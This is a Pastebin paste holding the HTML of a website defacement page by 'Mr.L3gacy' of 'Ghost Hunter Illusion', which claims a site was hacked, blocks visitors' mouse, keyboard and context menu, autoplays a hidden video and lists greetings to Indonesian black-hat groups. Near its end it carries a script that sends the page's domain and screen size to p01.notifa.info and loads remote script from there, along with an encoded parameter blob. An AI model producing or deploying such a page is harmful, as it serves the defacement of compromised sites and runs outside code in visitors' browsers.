NishinoTsukasa

ghi

Apr 6th, 2018
217
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.78 KB | None | 0 0
  1.  
  2. <html><head>
  3. <title>Where your security? !</title>
  4. <script language="JavaScript1.2">
  5. alert ("Hacked By Mr.L3gacy | Ghost Hunter Illusion !")
  6. function ClearError() {return true;}</script></head><body onmousedown="return false" onkeydown="return false" oncontextmenu="return false"><br><iframe src="https://www.youtube.com/embed/rqrliFbP3Nc?rel=0&amp;autoplay=1" allowfullscreen="" width="1" height="0" frameborder="0"></iframe>
  7. <style>
  8.  
  9. @import url(http://fonts.googleapis.com/css?family=Gilda+Display);
  10.  
  11. html {
  12. background:#000;font-family:Courier new;text-align:center;color:#fff
  13. -webkit-background-size: cover;
  14. -moz-background-size: cover;
  15. -o-background-size: cover;
  16. background-size: cover;
  17. }
  18.  
  19. .error {
  20. text-align: center;
  21. font-family: 'Gilda Display', serif;
  22.  
  23. text-align: center;
  24. width: 100%;
  25. height: 120px;
  26. margin: auto;
  27. position: absolute;
  28. top: 0;
  29. bottom: 0;
  30. left: -60px;
  31. right: 0;
  32. -webkit-animation: noise-3 1s linear infinite;
  33. animation: noise-3 1s linear infinite;
  34. overflow: default;
  35. }
  36.  
  37. body:after {
  38. content: 'Ghost Hunter Illusion';
  39. font-family: OCR-A;
  40. font-size: 100px;
  41.  
  42. text-align: center;
  43. width: 550px;
  44. margin: auto;
  45. position: absolute;
  46. top: 25%;
  47. bottom: 0;
  48. left: 0;
  49. right: 35%;
  50. opacity: 0;
  51. color: white;
  52. -webkit-animation: noise-1 .2s linear infinite;
  53. animation: noise-1 .2s linear infinite;
  54. }
  55. body:before {
  56. content: 'Ghost Hunter Illusion';
  57. font-family: OCR-A;
  58. font-size: 100px;
  59.  
  60. text-align: center;
  61. width: 550px;
  62. margin: auto;
  63. position: absolute;
  64. top: 25%;
  65. bottom: 0;
  66. left: 0;
  67. right: 35%;
  68. opacity: 0;
  69. color: white;
  70. -webkit-animation: noise-2 .2s linear infinite;
  71. animation: noise-2 .2s linear infinite;
  72. }
  73.  
  74. .error {
  75. text-align: center;
  76. width: 200px;
  77. height: 60px;
  78. margin: auto;
  79. position: absolute;
  80. top: 280px;
  81. bottom: 0;
  82. left: 20px;
  83. right: 0;
  84. -webkit-animation: noise-3 1s linear infinite;
  85. animation: noise-3 1s linear infinite;
  86. }
  87.  
  88. .info:before {
  89. content: 'Ghost Hunter Illusion';
  90. font-family: OCR-A;
  91. font-size: 100px;
  92. text-align: center;
  93. width: 800px;
  94. margin: auto;
  95. position: absolute;
  96. top: 20px;
  97. bottom: 0;
  98. left: 40px;
  99. right: 100px;
  100. opacity: 0;
  101. color: white;
  102. -webkit-animation: noise-2 .2s linear infinite;
  103. animation: noise-2 .2s linear infinite;
  104. }
  105.  
  106. .info:after {
  107. content: 'Ghost Hunter Illusion';
  108. font-family: OCR-A;
  109. font-size: 100px;
  110. text-align: center;
  111. width: 800px;
  112. margin: auto;
  113. position: absolute;
  114. top: 20px;
  115. bottom: 0;
  116. left: 40px;
  117. right: 0;
  118. opacity: 0;
  119. color: white;
  120. -webkit-animation: noise-1 .2s linear infinite;
  121. animation: noise-1 .2s linear infinite;
  122. }
  123.  
  124. @-webkit-keyframes noise-1 {
  125. 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  126. 10% {opacity: .1;}
  127. 50% {opacity: .5; left: -6px;}
  128. 80% {opacity: .3;}
  129. 100% {opacity: .6; left: 2px;}
  130. }
  131.  
  132. @keyframes noise-1 {
  133. 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  134. 10% {opacity: .1;}
  135. 50% {opacity: .5; left: -6px;}
  136. 80% {opacity: .3;}
  137. 100% {opacity: .6; left: 2px;}
  138. }
  139.  
  140. @-webkit-keyframes noise-2 {
  141. 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  142. 10% {opacity: .1;}
  143. 50% {opacity: .5; left: 6px;}
  144. 80% {opacity: .3;}
  145. 100% {opacity: .6; left: -2px;}
  146. }
  147.  
  148. @keyframes noise-2 {
  149. 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  150. 10% {opacity: .1;}
  151. 50% {opacity: .5; left: 6px;}
  152. 80% {opacity: .3;}
  153. 100% {opacity: .6; left: -2px;}
  154. }
  155.  
  156. @-webkit-keyframes noise {
  157. 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  158. 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  159. 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
  160. }
  161.  
  162. @keyframes noise {
  163. 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  164. 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  165. 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
  166. }
  167.  
  168. @-webkit-keyframes noise-3 {
  169. 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  170. 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  171. 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
  172. }
  173.  
  174. @keyframes noise-3 {
  175. 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  176. 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  177. 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
  178. }
  179.  
  180. .wrap {
  181. top: 30%;
  182. left: 25%;
  183.  
  184. height: 200px;
  185.  
  186. margin-top: -100px;
  187. position: absolute;
  188. }
  189. code {
  190. color: white;
  191. }
  192. span.blue {
  193. color: #48beef;
  194. }
  195. span.comment {
  196. color: #7f8c8d;
  197. }
  198. span.orange {
  199. color: #f39c12;
  200. }
  201. span.green {
  202. color: #33cc33;
  203. }
  204.  
  205. .viewFull {
  206. font-family:OCR-A;
  207. color:orange;
  208. text-decoration:;
  209. }
  210.  
  211.  
  212. }
  213.  
  214. @media only screen and (min-height: 500px) {
  215.  
  216. .viewFull{
  217. display:none;
  218. }
  219.  
  220. }
  221. </style><meta property="og:title" content="Ghost Hunter Illusion | Was here">
  222. <meta property="og:description" content=" Hacked By Mr.L3gacy ">
  223. <meta property="og:author" content="Not Impossible with me :')">
  224.  
  225. <meta charset="UTF-8">
  226.  
  227.  
  228. <style>body{background:#000;font-family:Courier new;text-align:center;color:#fff;}pre{margin-top:1%;
  229. cursor: url(http://cur.cursors-4u.net/cursors/cur-9/cur862.png), progress !important;
  230. }
  231. font {box-shadow: 0 0 10px darkblue;}
  232.  
  233. </style>
  234.  
  235.  
  236. <br>
  237. <center><a href="http://tinypic.com?ref=2r2qiw8" target="_blank"><img src="http://i64.tinypic.com/2r2qiw8.jpg" border="0" alt="Image and video hosting by TinyPic"></a> <br>
  238. <style>
  239. img{
  240. animation-name: rotate ;
  241. animation-duration: 4s;
  242. animation-play-state: running;
  243. animation-timing-function: linear;
  244. animation-iteration-count: infinite;
  245. }
  246. @keyframes rotate{
  247. 10% {transform:rotateY(36deg)}
  248. 20% {transform:rotateY(72deg)}
  249. 30% {transform:rotateY(108deg)}
  250. 40% {transform:rotateY(144deg)}
  251. 50% {transform:rotateY(180deg)}
  252. 60% {transform:rotateY(216deg)}
  253. 70% {transform:rotateY(252deg)}
  254. 80% {transform:rotateY(288deg)}
  255. 90% {transform:rotateY(324deg)}
  256. 100% {transform:rotateY(360deg)}
  257. }
  258. </style>
  259.  
  260.  
  261.  
  262. <br>
  263. <br>
  264.  
  265.  
  266. <marquee behavior="alternate" scrollamount="3" style="width: 45%;" width="45%"> Hacked By Mr.L3gacy | Ghost Hunter Illusion</marquee>
  267. <pre><font color="red">[</font>|GHOST HUNTER ILLUSION | Problem Cyber Team | REPUBLIK OF SECURITY FAMILY | D704T | EXI2T | INDONESIA SECURITY LITE | REBELLION GHOST|
  268. <font color="red">]</font><br><br>
  269. <font face="Pacifico" size="5" color="red">We are Ghost<br>We are Defacer
  270. your security just illusion
  271. we are illusion on your mind, but....
  272. we Ghost Hunter Illusion
  273. God Forgives, but we Not Forgives !!
  274.  
  275. Greets: | KATENBAD | security007 | T4MU | Xalvador_ | Mr.Donut's | SiWanna | Desktop77N3T | NX_404 |
  276. | Mr.MIZZHUNTER | L_Viole | Mr.b0t4k | iFlekzz | And all indonesian black hat |
  277. </pre>
  278. <br>
  279. <font size="4" color="white">Thanks To* : | EXI2T Cyber Team | Jelangkung Squad| Hacker Patah Hati | N45HT | Dark Friends | XaiSyndicate| Sora Cyber Team | Indonesia Defacer Tersakiti|</font>
  280. <br>
  281. [ONLY GOD CAN STOP US]<p><iframe scrolling="no" <script="" type="text/javascript" width="0%" height="0" frameborder="no">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5muMtikAF5rNL8vk%2bgX9W0%2bkjWZSdoKVo3GTdiTRxSea0rZDoUnag3tQx7tF2I84H7ryLaRRdR3GPJDmOB%2fI7z%2bLQu8vQN4lwlFffBfn2kMFlE7UjtCOCdURJfuJbrFxvmCSg7Vn4pW6SOHWP6TC6xYa4O5lG23mKQyiWyH9AZPjC9b%2b5GUzNrBWCieNPCHZKiAR276y3eUr9tjuLdnlO1Sd1LzLtDn3wV0RukVWbH4zZnj4AC0NqDzzVu06nHn5phGVB9vhxYtooFQrCIAXOfFQ8lKGwQyH3INv%2fkFtCc0wtZAsaevMly6NC4WTRC4xBiPoR706paWEatuXovtrQ5FzQQQ9%2fgKEiODk966cZadTo3xv%2fYeIVl2Ec0fnQ%2fA0SqLdBaKX7HkwRe3z0kW5RHFY0ZgqVyF3vexTR6ZWMo2GV%2fmm0B%2fJ%2f%2bsrPGFScyFs%2btCFoW89VbmLO1gzFXlpcAxvJhX9%2f9ZkjRJuq80rGlCbHZwutqmyldgOIwdyrdxxkKoBFlNzPoB48%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html></iframe></p></center></body></html>
Advertisement
Add Comment
Please, Sign In to add comment